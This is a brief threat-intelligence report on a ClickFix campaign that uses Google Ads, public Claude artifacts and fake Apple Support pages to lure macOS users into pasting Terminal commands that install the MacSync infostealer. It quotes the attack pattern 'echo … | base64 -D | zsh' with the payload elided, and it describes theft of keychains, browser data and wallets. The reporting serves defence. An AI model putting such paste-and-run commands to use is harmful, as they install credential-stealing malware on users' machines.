Threat actors are abusing public Claude artifacts and malicious Google Ads in ClickFix campaigns to trick macOS users into pasting shell commands that install the MacSync infostealer. Researchers from Moonlock Lab and AdGuard observed multiple variants and thousands of views, with the same C2 infrastructure linking the activity to a single actor. #MacSync #Claude
Keypoints
- Malicious Google Search results direct users to public Claude artifacts or fake Apple Support pages that instruct users to run Terminal commands.
- At least two attack variants were seen, using commands like βecho ββ¦β | base64 -D | zshβ and a curlβandβzsh payload download.
- Those commands install a loader for the MacSync infostealer, which uses AppleScript to steal keychains, browser data, and crypto wallets.
- Researchers noted thousands of views (12,300β15,600) of the malicious guides and observed both variants fetching a second stage from the same C2, suggesting one threat actor.
- Users should avoid running unfamiliar Terminal commands and verify command safety β for example, by checking with a trusted tool or asking the same LLM in the conversation.